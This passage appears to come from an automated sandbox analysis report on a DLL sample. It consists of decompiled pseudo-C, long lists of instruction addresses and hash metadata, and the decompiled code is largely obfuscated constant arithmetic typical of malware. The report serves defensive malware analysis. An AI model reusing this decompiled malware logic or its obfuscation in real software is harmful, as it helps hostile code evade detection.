                                                                                                                                                                                      							}
                                                                                                                                                                                      							E003D2CF9(_v316, _v324, _v244, _v252, _v112);
                                                                                                                                                                                      							L25:
                                                                                                                                                                                      							return _t981;
                                                                                                                                                                                      							L36:
                                                                                                                                                                                      							__eflags = _t834 - 0x911112e;
                                                                                                                                                                                      						} while (__eflags != 0);
                                                                                                                                                                                      						goto L25;
                                                                                                                                                                                      					}
                                                                                                                                                                                      				}
                                                                                                                                                                                      			}



































































































































                                                                                                                                                                                      0x003dc69b
                                                                                                                                                                                      0x003dc6a1
                                                                                                                                                                                      0x003dc6b9
                                                                                                                                                                                      0x003dc6c0
                                                                                                                                                                                      0x003dc6c5
                                                                                                                                                                                      0x003dc6c8
                                                                                                                                                                                      0x003dc6c9
                                                                                                                                                                                      0x003dc6cb
                                                                                                                                                                                      0x003dc6d0
                                                                                                                                                                                      0x003dc6d1
                                                                                                                                                                                      0x003dc6e7
                                                                                                                                                                                      0x003dc6ee
                                                                                                                                                                                      0x003dc6f6
                                                                                                                                                                                      0x003dc701
                                                                                                                                                                                      0x003dc70c
                                                                                                                                                                                      0x003dc717
                                                                                                                                                                                      0x003dc722
                                                                                                                                                                                      0x003dc72f
                                                                                                                                                                                      0x003dc732
                                                                                                                                                                                      0x003dc736
                                                                                                                                                                                      0x003dc73b
                                                                                                                                                                                      0x003dc740
                                                                                                                                                                                      0x003dc748
                                                                                                                                                                                      0x003dc753
                                                                                                                                                                                      0x003dc75e
                                                                                                                                                                                      0x003dc769
                                                                                                                                                                                      0x003dc774
                                                                                                                                                                                      0x003dc77f
                                                                                                                                                                                      0x003dc78a
                                                                                                                                                                                      0x003dc7a0
                                                                                                                                                                                      0x003dc7a7
                                                                                                                                                                                      0x003dc7b2
                                                                                                                                                                                      0x003dc7ba
                                                                                                                                                                                      0x003dc7c2
                                                                                                                                                                                      0x003dc7cc
                                                                                                                                                                                      0x003dc7cd
                                                                                                                                                                                      0x003dc7d1
                                                                                                                                                                                      0x003dc7d9
                                                                                                                                                                                      0x003dc7e4
                                                                                                                                                                                      0x003dc7ec
                                                                                                                                                                                      0x003dc7f4
                                                                                                                                                                                      0x003dc7ff
                                                                                                                                                                                      0x003dc80a
                                                                                                                                                                                      0x003dc812
                                                                                                                                                                                      0x003dc819
                                                                                                                                                                                      0x003dc824
                                                                                                                                                                                      0x003dc82c
                                                                                                                                                                                      0x003dc834
                                                                                                                                                                                      0x003dc839
                                                                                                                                                                                      0x003dc841
                                                                                                                                                                                      0x003dc849
                                                                                                                                                                                      0x003dc85c
                                                                                                                                                                                      0x003dc863
                                                                                                                                                                                      0x003dc86e
                                                                                                                                                                                      0x003dc879
                                                                                                                                                                                      0x003dc884
                                                                                                                                                                                      0x003dc88f
                                                                                                                                                                                      0x003dc89a
                                                                                                                                                                                      0x003dc8b0
                                                                                                                                                                                      0x003dc8c0
                                                                                                                                                                                      0x003dc8c5
                                                                                                                                                                                      0x003dc8ce
                                                                                                                                                                                      0x003dc8d9
                                                                                                                                                                                      0x003dc8e1
                                                                                                                                                                                      0x003dc8e9
                                                                                                                                                                                      0x003dc8f5
                                                                                                                                                                                      0x003dc8fa
                                                                                                                                                                                      0x003dc900
                                                                                                                                                                                      0x003dc908
                                                                                                                                                                                      0x003dc913
                                                                                                                                                                                      0x003dc91b
                                                                                                                                                                                      0x003dc926
                                                                                                                                                                                      0x003dc931
                                                                                                                                                                                      0x003dc93c
                                                                                                                                                                                      0x003dc947
                                                                                                                                                                                      0x003dc952
                                                                                                                                                                                      0x003dc95d
                                                                                                                                                                                      0x003dc968
                                                                                                                                                                                      0x003dc973
                                                                                                                                                                                      0x003dc97e
                                                                                                                                                                                      0x003dc989
                                                                                                                                                                                      0x003dc991
                                                                                                                                                                                      0x003dc999
                                                                                                                                                                                      0x003dc99e
                                                                                                                                                                                      0x003dc9a6
                                                                                                                                                                                      0x003dc9ae
                                                                                                                                                                                      0x003dc9b9
                                                                                                                                                                                      0x003dc9c1
                                                                                                                                                                                      0x003dc9cc
                                                                                                                                                                                      0x003dc9d7
                                                                                                                                                                                      0x003dc9de
                                                                                                                                                                                      0x003dc9e9
                                                                                                                                                                                      0x003dc9f4
                                                                                                                                                                                      0x003dc9ff
                                                                                                                                                                                      0x003dca0a
                                                                                                                                                                                      0x003dca1c
                                                                                                                                                                                      0x003dca1f
                                                                                                                                                                                      0x003dca26
                                                                                                                                                                                      0x003dca31
                                                                                                                                                                                      0x003dca44
                                                                                                                                                                                      0x003dca4b
                                                                                                                                                                                      0x003dca56
                                                                                                                                                                                      0x003dca61
                                                                                                                                                                                      0x003dca6c
                                                                                                                                                                                      0x003dca77
                                                                                                                                                                                      0x003dca82
                                                                                                                                                                                      0x003dca8d
                                                                                                                                                                                      0x003dca98
                                                                                                                                                                                      0x003dcaa5
                                                                                                                                                                                      0x003dcaa9
                                                                                                                                                                                      0x003dcab1
                                                                                                                                                                                      0x003dcab6
                                                                                                                                                                                      0x003dcabe
                                                                                                                                                                                      0x003dcac9
                                                                                                                                                                                      0x003dcad4
                                                                                                                                                                                      0x003dcadc
                                                                                                                                                                                      0x003dcae7
                                                                                                                                                                                      0x003dcaef
                                                                                                                                                                                      0x003dcafc
                                                                                                                                                                                      0x003dcb00
                                                                                                                                                                                      0x003dcb05
                                                                                                                                                                                      0x003dcb0d
                                                                                                                                                                                      0x003dcb15
                                                                                                                                                                                      0x003dcb1d
                                                                                                                                                                                      0x003dcb25
                                                                                                                                                                                      0x003dcb2a
                                                                                                                                                                                      0x003dcb32
                                                                                                                                                                                      0x003dcb3d
                                                                                                                                                                                      0x003dcb4a
                                                                                                                                                                                      0x003dcb52
                                                                                                                                                                                      0x003dcb5d
                                                                                                                                                                                      0x003dcb72
                                                                                                                                                                                      0x003dcb75
                                                                                                                                                                                      0x003dcb76
                                                                                                                                                                                      0x003dcb7d
                                                                                                                                                                                      0x003dcb88
                                                                                                                                                                                      0x003dcb9d
                                                                                                                                                                                      0x003dcba4
                                                                                                                                                                                      0x003dcbaf
                                                                                                                                                                                      0x003dcbba
                                                                                                                                                                                      0x003dcbc5
                                                                                                                                                                                      0x003dcbd0
                                                                                                                                                                                      0x003dcbdb
                                                                                                                                                                                      0x003dcbe3
                                                                                                                                                                                      0x003dcbeb
                                                                                                                                                                                      0x003dcbf5
                                                                                                                                                                                      0x003dcbf9
                                                                                                                                                                                      0x003dcc01
                                                                                                                                                                                      0x003dcc0e
                                                                                                                                                                                      0x003dcc12
                                                                                                                                                                                      0x003dcc17
                                                                                                                                                                                      0x003dcc1f
                                                                                                                                                                                      0x003dcc27
                                                                                                                                                                                      0x003dcc2f
                                                                                                                                                                                      0x003dcc34
                                                                                                                                                                                      0x003dcc41
                                                                                                                                                                                      0x003dcc45
                                                                                                                                                                                      0x003dcc4d
                                                                                                                                                                                      0x003dcc55
                                                                                                                                                                                      0x003dcc5a
                                                                                                                                                                                      0x003dcc6a
                                                                                                                                                                                      0x003dcc6e
                                                                                                                                                                                      0x003dcc76
                                                                                                                                                                                      0x003dcc86
                                                                                                                                                                                      0x003dcc8f
                                                                                                                                                                                      0x003dcc90
                                                                                                                                                                                      0x003dcc9a
                                                                                                                                                                                      0x003dcc9e
                                                                                                                                                                                      0x003dcca6
                                                                                                                                                                                      0x003dccae
                                                                                                                                                                                      0x003dccb6
                                                                                                                                                                                      0x003dccbe
                                                                                                                                                                                      0x003dccc3
                                                                                                                                                                                      0x003dcccb
                                                                                                                                                                                      0x003dccd6
                                                                                                                                                                                      0x003dcce1
                                                                                                                                                                                      0x003dccec
                                                                                                                                                                                      0x003dccff
                                                                                                                                                                                      0x003dcd06
                                                                                                                                                                                      0x003dcd11
                                                                                                                                                                                      0x003dcd1c
                                                                                                                                                                                      0x003dcd27
                                                                                                                                                                                      0x003dcd32
                                                                                                                                                                                      0x003dcd3d
                                                                                                                                                                                      0x003dcd45
                                                                                                                                                                                      0x003dcd50
                                                                                                                                                                                      0x003dcd5b
                                                                                                                                                                                      0x003dcd66
                                                                                                                                                                                      0x003dcd6e
                                                                                                                                                                                      0x003dcd79
                                                                                                                                                                                      0x003dcd86
                                                                                                                                                                                      0x003dcd8e
                                                                                                                                                                                      0x003dcd99
                                                                                                                                                                                      0x003dcda4
                                                                                                                                                                                      0x003dcdb8
                                                                                                                                                                                      0x003dcdbd
                                                                                                                                                                                      0x003dcdc6
                                                                                                                                                                                      0x003dcdd1
                                                                                                                                                                                      0x003dcdde
                                                                                                                                                                                      0x003dcde1
                                                                                                                                                                                      0x003dcde5
                                                                                                                                                                                      0x003dcded
                                                                                                                                                                                      0x003dcdf5
                                                                                                                                                                                      0x003dcdfd
                                                                                                                                                                                      0x003dce05
                                                                                                                                                                                      0x003dce0d
                                                                                                                                                                                      0x003dce17
                                                                                                                                                                                      0x003dce1b
                                                                                                                                                                                      0x003dce23
                                                                                                                                                                                      0x003dce2b
                                                                                                                                                                                      0x003dce33
                                                                                                                                                                                      0x003dce3b
                                                                                                                                                                                      0x003dce43
                                                                                                                                                                                      0x003dce47
                                                                                                                                                                                      0x003dce4f
                                                                                                                                                                                      0x003dce5a
                                                                                                                                                                                      0x003dce6c
                                                                                                                                                                                      0x003dce71
                                                                                                                                                                                      0x003dce7a
                                                                                                                                                                                      0x003dce85
                                                                                                                                                                                      0x003dce92
                                                                                                                                                                                      0x003dce95
                                                                                                                                                                                      0x003dce99
                                                                                                                                                                                      0x003dcea6
                                                                                                                                                                                      0x003dceaa
                                                                                                                                                                                      0x003dceb2
                                                                                                                                                                                      0x003dceba
                                                                                                                                                                                      0x003dcebf
                                                                                                                                                                                      0x003dcec7
                                                                                                                                                                                      0x003dcecf
                                                                                                                                                                                      0x003dced7
                                                                                                                                                                                      0x003dcee2
                                                                                                                                                                                      0x003dceea
                                                                                                                                                                                      0x003dcef5
                                                                                                                                                                                      0x003dcf05
                                                                                                                                                                                      0x003dcf0d
                                                                                                                                                                                      0x003dcf10
                                                                                                                                                                                      0x003dcf14
                                                                                                                                                                                      0x003dcf1c
                                                                                                                                                                                      0x003dcf24
                                                                                                                                                                                      0x003dcf37
                                                                                                                                                                                      0x003dcf3e
                                                                                                                                                                                      0x003dcf46
                                                                                                                                                                                      0x003dcf51
                                                                                                                                                                                      0x003dcf5c
                                                                                                                                                                                      0x003dcf64
                                                                                                                                                                                      0x003dcf6f
                                                                                                                                                                                      0x003dcf7c
                                                                                                                                                                                      0x003dcf90
                                                                                                                                                                                      0x003dcf95
                                                                                                                                                                                      0x003dcf9c
                                                                                                                                                                                      0x003dcfa7
                                                                                                                                                                                      0x003dcfb5
                                                                                                                                                                                      0x003dcfba
                                                                                                                                                                                      0x003dcfbe
                                                                                                                                                                                      0x003dcfc9
                                                                                                                                                                                      0x003dcfce
                                                                                                                                                                                      0x003dcfd2
                                                                                                                                                                                      0x003dcfda
                                                                                                                                                                                      0x003dcfe5
                                                                                                                                                                                      0x003dcfed
                                                                                                                                                                                      0x003dcff8
                                                                                                                                                                                      0x003dd003
                                                                                                                                                                                      0x003dd00e
                                                                                                                                                                                      0x003dd019
                                                                                                                                                                                      0x003dd027
                                                                                                                                                                                      0x003dd02c
                                                                                                                                                                                      0x003dd038
                                                                                                                                                                                      0x003dd03c
                                                                                                                                                                                      0x003dd044
                                                                                                                                                                                      0x003dd04c
                                                                                                                                                                                      0x003dd057
                                                                                                                                                                                      0x003dd062
                                                                                                                                                                                      0x003dd06d
                                                                                                                                                                                      0x003dd078
                                                                                                                                                                                      0x003dd083
                                                                                                                                                                                      0x003dd08e
                                                                                                                                                                                      0x003dd096
                                                                                                                                                                                      0x003dd0a6
                                                                                                                                                                                      0x003dd0aa
                                                                                                                                                                                      0x003dd0af
                                                                                                                                                                                      0x003dd0b7
                                                                                                                                                                                      0x003dd0c2
                                                                                                                                                                                      0x003dd0ca
                                                                                                                                                                                      0x003dd0d5
                                                                                                                                                                                      0x003dd0e0
                                                                                                                                                                                      0x003dd0eb
                                                                                                                                                                                      0x003dd0f6
                                                                                                                                                                                      0x003dd101
                                                                                                                                                                                      0x003dd10c
                                                                                                                                                                                      0x003dd114
                                                                                                                                                                                      0x003dd11f
                                                                                                                                                                                      0x003dd12a
                                                                                                                                                                                      0x003dd135
                                                                                                                                                                                      0x003dd140
                                                                                                                                                                                      0x003dd14b
                                                                                                                                                                                      0x003dd156
                                                                                                                                                                                      0x003dd161
                                                                                                                                                                                      0x003dd16c
                                                                                                                                                                                      0x003dd177
                                                                                                                                                                                      0x003dd184
                                                                                                                                                                                      0x003dd190
                                                                                                                                                                                      0x003dd195
                                                                                                                                                                                      0x003dd19b
                                                                                                                                                                                      0x003dd1a3
                                                                                                                                                                                      0x003dd1ac
                                                                                                                                                                                      0x003dd1b1
                                                                                                                                                                                      0x003dd1b6
                                                                                                                                                                                      0x003dd1bc
                                                                                                                                                                                      0x003dd1c4
                                                                                                                                                                                      0x003dd1d6
                                                                                                                                                                                      0x003dd1db
                                                                                                                                                                                      0x003dd1e4
                                                                                                                                                                                      0x003dd1ec
                                                                                                                                                                                      0x003dd1f7
                                                                                                                                                                                      0x003dd1ff
                                                                                                                                                                                      0x003dd207
                                                                                                                                                                                      0x003dd20f
                                                                                                                                                                                      0x003dd217
                                                                                                                                                                                      0x003dd21f
                                                                                                                                                                                      0x003dd227
                                                                                                                                                                                      0x003dd22c
                                                                                                                                                                                      0x003dd234
                                                                                                                                                                                      0x003dd23c
                                                                                                                                                                                      0x003dd244
                                                                                                                                                                                      0x003dd24c
                                                                                                                                                                                      0x003dd258
                                                                                                                                                                                      0x003dd25d
                                                                                                                                                                                      0x003dd267
                                                                                                                                                                                      0x003dd26c
                                                                                                                                                                                      0x003dd272
                                                                                                                                                                                      0x003dd27a
                                                                                                                                                                                      0x003dd285
                                                                                                                                                                                      0x003dd294
                                                                                                                                                                                      0x003dd297
                                                                                                                                                                                      0x003dd29e
                                                                                                                                                                                      0x003dd2a9
                                                                                                                                                                                      0x003dd2a9
                                                                                                                                                                                      0x003dd2a9
                                                                                                                                                                                      0x003dd2ae
                                                                                                                                                                                      0x003dd2ae
                                                                                                                                                                                      0x003dd2ae
                                                                                                                                                                                      0x003dd2b3
                                                                                                                                                                                      0x003dd2b3
                                                                                                                                                                                      0x003dd2b3
                                                                                                                                                                                      0x003dd2b3
                                                                                                                                                                                      0x003dd2b9
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x003dd2bf
                                                                                                                                                                                      0x003dd48f
                                                                                                                                                                                      0x003dd496
                                                                                                                                                                                      0x003dd2a9
                                                                                                                                                                                      0x003dd2a9
                                                                                                                                                                                      0x003dd2a9
                                                                                                                                                                                      0x003dd2ae
                                                                                                                                                                                      0x003dd2ae
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x003dd2ae
                                                                                                                                                                                      0x003dd2a9
                                                                                                                                                                                      0x003dd2c7
                                                                                                                                                                                      0x003dd462
                                                                                                                                                                                      0x003dd469
                                                                                                                                                                                      0x003dd2a9
                                                                                                                                                                                      0x003dd2a9
                                                                                                                                                                                      0x003dd2a9
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x003dd2a9
                                                                                                                                                                                      0x003dd2a9
                                                                                                                                                                                      0x003dd2cf
                                                                                                                                                                                      0x003dd435
                                                                                                                                                                                      0x003dd43c
                                                                                                                                                                                      0x003dd442
                                                                                                                                                                                      0x003dd444
                                                                                                                                                                                      0x003dd2a9
                                                                                                                                                                                      0x003dd2a9
                                                                                                                                                                                      0x003dd2a9
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x003dd2a9
                                                                                                                                                                                      0x003dd2a9
                                                                                                                                                                                      0x003dd2db
                                                                                                                                                                                      0x003dd40e
                                                                                                                                                                                      0x003dd41a
                                                                                                                                                                                      0x003dd41d
                                                                                                                                                                                      0x003dd421
                                                                                                                                                                                      0x003dd426
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x003dd426
                                                                                                                                                                                      0x003dd2e7
                                                                                                                                                                                      0x003dd359
                                                                                                                                                                                      0x003dd35e
                                                                                                                                                                                      0x003dd3bc
                                                                                                                                                                                      0x003dd3d2
                                                                                                                                                                                      0x003dd3d9
                                                                                                                                                                                      0x003dd3de
                                                                                                                                                                                      0x003dd3e1
                                                                                                                                                                                      0x003dd3e1
                                                                                                                                                                                      0x003dd715
                                                                                                                                                                                      0x003dd715
                                                                                                                                                                                      0x003dd71a
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x003dd71a
                                                                                                                                                                                      0x003dd2ef
                                                                                                                                                                                      0x003dd33f
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x003dd33f
                                                                                                                                                                                      0x003dd2f3
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x003dd328
                                                                                                                                                                                      0x003dd32d
                                                                                                                                                                                      0x003dd337
                                                                                                                                                                                      0x003dd2a9
                                                                                                                                                                                      0x003dd2a9
                                                                                                                                                                                      0x003dd2a9
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x003dd2a9
                                                                                                                                                                                      0x003dd2a9
                                                                                                                                                                                      0x003dd4a2
                                                                                                                                                                                      0x003dd4a4
                                                                                                                                                                                      0x003dd6c7
                                                                                                                                                                                      0x003dd6f5
                                                                                                                                                                                      0x003dd6fa
                                                                                                                                                                                      0x003dd6fd
                                                                                                                                                                                      0x003dd704
                                                                                                                                                                                      0x003dd710
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x003dd710
                                                                                                                                                                                      0x003dd706
                                                                                                                                                                                      0x003dd2a9
                                                                                                                                                                                      0x003dd2a9
                                                                                                                                                                                      0x003dd2a9
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x003dd2a9
                                                                                                                                                                                      0x003dd2a9
                                                                                                                                                                                      0x003dd4aa
                                                                                                                                                                                      0x003dd4b0
                                                                                                                                                                                      0x003dd6ab
                                                                                                                                                                                      0x003dd6b2
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x003dd6b2
                                                                                                                                                                                      0x003dd4b6
                                                                                                                                                                                      0x003dd4bc
                                                                                                                                                                                      0x003dd5e0
                                                                                                                                                                                      0x003dd5e5
                                                                                                                                                                                      0x003dd5fa
                                                                                                                                                                                      0x003dd645
                                                                                                                                                                                      0x003dd65b
                                                                                                                                                                                      0x003dd665
                                                                                                                                                                                      0x003dd680
                                                                                                                                                                                      0x003dd685
                                                                                                                                                                                      0x003dd688
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x003dd688
                                                                                                                                                                                      0x003dd4c2
                                                                                                                                                                                      0x003dd4c4
                                                                                                                                                                                      0x003dd512
                                                                                                                                                                                      0x003dd517
                                                                                                                                                                                      0x003dd51f
                                                                                                                                                                                      0x003dd527
                                                                                                                                                                                      0x003dd529
                                                                                                                                                                                      0x003dd568
                                                                                                                                                                                      0x003dd56d
                                                                                                                                                                                      0x003dd570
                                                                                                                                                                                      0x003dd577
                                                                                                                                                                                      0x003dd5b7
                                                                                                                                                                                      0x003dd579
                                                                                                                                                                                      0x003dd579
                                                                                                                                                                                      0x003dd587
                                                                                                                                                                                      0x003dd58e
                                                                                                                                                                                      0x003dd595
                                                                                                                                                                                      0x003dd5a4
                                                                                                                                                                                      0x003dd5a7
                                                                                                                                                                                      0x003dd5a8
                                                                                                                                                                                      0x003dd5ad
                                                                                                                                                                                      0x003dd5b0
                                                                                                                                                                                      0x003dd5b0
                                                                                                                                                                                      0x003dd5c9
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x003dd5cf
                                                                                                                                                                                      0x003dd4c6
                                                                                                                                                                                      0x003dd4cc
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x003dd4f2
                                                                                                                                                                                      0x003dd4fc
                                                                                                                                                                                      0x003dd506
                                                                                                                                                                                      0x003dd71f
                                                                                                                                                                                      0x003dd71f
                                                                                                                                                                                      0x003dd71f
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x003dd72b
                                                                                                                                                                                      0x003dd2ae

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648394572.00000000003D0000.00000040.00000010.sdmp, Offset: 003D0000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3d0000_loaddll32.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: 9K$D1$K8zQ$YB$]^$dV$eCf$g$hcuU$oaj$w:"$~Y$H$RN$RN$U
                                                                                                                                                                                      • API String ID: 0-3730166627
                                                                                                                                                                                      • Opcode ID: 0f1ac96436cfd6475ee4bb1111d3927a2cd3b2086a90cc85a10b143d86617f75
                                                                                                                                                                                      • Instruction ID: dd1208198be561167173d61da0db2f21d8249dd40bc261379df87f48967c1413
                                                                                                                                                                                      • Opcode Fuzzy Hash: 0f1ac96436cfd6475ee4bb1111d3927a2cd3b2086a90cc85a10b143d86617f75
                                                                                                                                                                                      • Instruction Fuzzy Hash: C58210725083808FD379CF25D58AB9BBBE2BBC5304F10891DE5D99A260DBB19949CF43
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 96%
                                                                                                                                                                                      			E003E1C12(void* __ecx) {
                                                                                                                                                                                      				char _v524;
                                                                                                                                                                                      				char _v1044;
                                                                                                                                                                                      				char _v1564;
                                                                                                                                                                                      				char _v2084;
                                                                                                                                                                                      				char _v2604;
                                                                                                                                                                                      				signed int _v2608;
                                                                                                                                                                                      				intOrPtr _v2612;
                                                                                                                                                                                      				intOrPtr _v2616;
                                                                                                                                                                                      				intOrPtr _v2620;
                                                                                                                                                                                      				char _v2624;
                                                                                                                                                                                      				intOrPtr _v2628;
                                                                                                                                                                                      				char _v2632;
                                                                                                                                                                                      				signed int _v2636;
                                                                                                                                                                                      				signed int _v2640;
                                                                                                                                                                                      				signed int _v2644;
                                                                                                                                                                                      				signed int _v2648;
                                                                                                                                                                                      				signed int _v2652;
                                                                                                                                                                                      				signed int _v2656;
                                                                                                                                                                                      				signed int _v2660;
                                                                                                                                                                                      				signed int _v2664;
                                                                                                                                                                                      				signed int _v2668;
                                                                                                                                                                                      				signed int _v2672;
                                                                                                                                                                                      				signed int _v2676;
                                                                                                                                                                                      				signed int _v2680;
                                                                                                                                                                                      				signed int _v2684;
                                                                                                                                                                                      				signed int _v2688;
                                                                                                                                                                                      				signed int _v2692;
                                                                                                                                                                                      				signed int _v2696;
                                                                                                                                                                                      				signed int _v2700;
                                                                                                                                                                                      				signed int _v2704;
                                                                                                                                                                                      				signed int _v2708;
                                                                                                                                                                                      				signed int _v2712;
                                                                                                                                                                                      				signed int _v2716;
                                                                                                                                                                                      				signed int _v2720;
                                                                                                                                                                                      				signed int _v2724;
                                                                                                                                                                                      				signed int _v2728;
                                                                                                                                                                                      				signed int _v2732;
                                                                                                                                                                                      				signed int _v2736;
                                                                                                                                                                                      				signed int _v2740;
                                                                                                                                                                                      				signed int _v2744;
                                                                                                                                                                                      				signed int _v2748;
                                                                                                                                                                                      				signed int _v2752;
                                                                                                                                                                                      				signed int _v2756;
                                                                                                                                                                                      				signed int _v2760;
                                                                                                                                                                                      				signed int _v2764;
                                                                                                                                                                                      				signed int _v2768;
                                                                                                                                                                                      				signed int _v2772;
                                                                                                                                                                                      				signed int _v2776;
                                                                                                                                                                                      				signed int _v2780;
                                                                                                                                                                                      				signed int _v2784;
                                                                                                                                                                                      				signed int _v2788;
                                                                                                                                                                                      				signed int _v2792;
                                                                                                                                                                                      				signed int _v2796;
                                                                                                                                                                                      				signed int _v2800;
                                                                                                                                                                                      				signed int _v2804;
                                                                                                                                                                                      				signed int _v2808;
                                                                                                                                                                                      				signed int _v2812;
                                                                                                                                                                                      				signed int _v2816;
                                                                                                                                                                                      				signed int _v2820;
                                                                                                                                                                                      				signed int _v2824;
                                                                                                                                                                                      				signed int _v2828;
                                                                                                                                                                                      				signed int _v2832;
                                                                                                                                                                                      				signed int _v2836;
                                                                                                                                                                                      				signed int _v2840;
                                                                                                                                                                                      				signed int _v2844;
                                                                                                                                                                                      				signed int _v2848;
                                                                                                                                                                                      				signed int _v2852;
                                                                                                                                                                                      				signed int _v2856;
                                                                                                                                                                                      				signed int _v2860;
                                                                                                                                                                                      				signed int _v2864;
                                                                                                                                                                                      				signed int _v2868;
                                                                                                                                                                                      				signed int _v2872;
                                                                                                                                                                                      				signed int _v2876;
                                                                                                                                                                                      				unsigned int _v2880;
                                                                                                                                                                                      				signed int _v2884;
                                                                                                                                                                                      				signed int _v2888;
                                                                                                                                                                                      				signed int _v2892;
                                                                                                                                                                                      				signed int _v2896;
                                                                                                                                                                                      				signed int _v2900;
                                                                                                                                                                                      				signed int _v2904;
                                                                                                                                                                                      				signed int _v2908;
                                                                                                                                                                                      				signed int _v2912;
                                                                                                                                                                                      				signed int _v2916;
                                                                                                                                                                                      				signed int _v2920;
                                                                                                                                                                                      				signed int _v2924;
                                                                                                                                                                                      				signed int _v2928;
                                                                                                                                                                                      				signed int _v2932;
                                                                                                                                                                                      				void* _t755;
                                                                                                                                                                                      				void* _t756;
                                                                                                                                                                                      				short* _t766;
                                                                                                                                                                                      				signed int _t773;
                                                                                                                                                                                      				signed int _t779;
                                                                                                                                                                                      				signed int _t788;
                                                                                                                                                                                      				void* _t791;
                                                                                                                                                                                      				signed int _t793;
                                                                                                                                                                                      				signed int _t794;
                                                                                                                                                                                      				signed int _t795;
                                                                                                                                                                                      				signed int _t796;
                                                                                                                                                                                      				signed int _t797;
                                                                                                                                                                                      				signed int _t798;
                                                                                                                                                                                      				signed int _t799;
                                                                                                                                                                                      				signed int _t800;
                                                                                                                                                                                      				signed int _t801;
                                                                                                                                                                                      				signed int _t802;
                                                                                                                                                                                      				signed int _t803;
                                                                                                                                                                                      				signed int _t804;
                                                                                                                                                                                      				signed int _t805;
                                                                                                                                                                                      				signed int _t806;
                                                                                                                                                                                      				signed int _t807;
                                                                                                                                                                                      				signed int _t808;
                                                                                                                                                                                      				signed int _t809;
                                                                                                                                                                                      				void* _t812;
                                                                                                                                                                                      				signed int _t877;
                                                                                                                                                                                      				void* _t882;
                                                                                                                                                                                      				signed int* _t883;
                                                                                                                                                                                      				signed int* _t884;
                                                                                                                                                                                      				void* _t887;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t883 =  &_v2932;
                                                                                                                                                                                      				_v2608 = _v2608 & 0x00000000;
                                                                                                                                                                                      				_v2612 = 0xa3d4eb;
                                                                                                                                                                                      				_v2660 = 0x6758cb;
                                                                                                                                                                                      				_v2660 = _v2660 << 4;
                                                                                                                                                                                      				_v2660 = _v2660 ^ 0x06758c99;
                                                                                                                                                                                      				_v2732 = 0xdc8525;
                                                                                                                                                                                      				_v2732 = _v2732 | 0x3ff23f5d;
                                                                                                                                                                                      				_v2732 = _v2732 ^ 0x3feebf7d;
                                                                                                                                                                                      				_v2928 = 0xfbcda8;
                                                                                                                                                                                      				_v2928 = _v2928 | 0x9eb5e9b7;
                                                                                                                                                                                      				_v2928 = _v2928 + 0xffff6f36;
                                                                                                                                                                                      				_v2928 = _v2928 + 0xffffec33;
                                                                                                                                                                                      				_v2928 = _v2928 ^ 0x9ef08d4a;
                                                                                                                                                                                      				_v2756 = 0xde70d9;
                                                                                                                                                                                      				_t882 = __ecx;
                                                                                                                                                                                      				_t877 = 0x99d8a48;
                                                                                                                                                                                      				_t793 = 0x28;
                                                                                                                                                                                      				_v2756 = _v2756 / _t793;
                                                                                                                                                                                      				_v2756 = _v2756 | 0x7728469f;
                                                                                                                                                                                      				_v2756 = _v2756 ^ 0x772920e1;
                                                                                                                                                                                      				_v2900 = 0xe4279b;
                                                                                                                                                                                      				_v2900 = _v2900 >> 0xc;
                                                                                                                                                                                      				_v2900 = _v2900 * 0x68;
                                                                                                                                                                                      				_v2900 = _v2900 + 0xffff73cc;
                                                                                                                                                                                      				_v2900 = _v2900 ^ 0x000006fc;
                                                                                                                                                                                      				_v2688 = 0xa4ffcb;
                                                                                                                                                                                      				_v2688 = _v2688 + 0xffff5cd6;
                                                                                                                                                                                      				_v2688 = _v2688 ^ 0x00a04a41;
                                                                                                                                                                                      				_v2908 = 0xc9c6ce;
                                                                                                                                                                                      				_v2908 = _v2908 | 0xf5fbf83a;
                                                                                                                                                                                      				_v2908 = _v2908 + 0x7e10;
                                                                                                                                                                                      				_v2908 = _v2908 / _t793;
                                                                                                                                                                                      				_v2908 = _v2908 ^ 0x062c0b4a;
                                                                                                                                                                                      				_v2916 = 0x7f9442;
                                                                                                                                                                                      				_v2916 = _v2916 << 0xb;
                                                                                                                                                                                      				_v2916 = _v2916 ^ 0x8520fee0;
                                                                                                                                                                                      				_v2916 = _v2916 + 0xe609;
                                                                                                                                                                                      				_v2916 = _v2916 ^ 0x798f337b;
                                                                                                                                                                                      				_v2652 = 0x9f68d1;
                                                                                                                                                                                      				_t794 = 0x4e;
                                                                                                                                                                                      				_v2652 = _v2652 * 0x2e;
                                                                                                                                                                                      				_v2652 = _v2652 ^ 0x1cad1c96;
                                                                                                                                                                                      				_v2680 = 0x874387;
                                                                                                                                                                                      				_v2680 = _v2680 / _t794;
                                                                                                                                                                                      				_v2680 = _v2680 ^ 0x000eef56;
                                                                                                                                                                                      				_v2740 = 0x218d86;
                                                                                                                                                                                      				_v2740 = _v2740 ^ 0x8da9a7ec;
                                                                                                                                                                                      				_v2740 = _v2740 + 0xffff8c18;
                                                                                                                                                                                      				_v2740 = _v2740 ^ 0x8d8801a5;
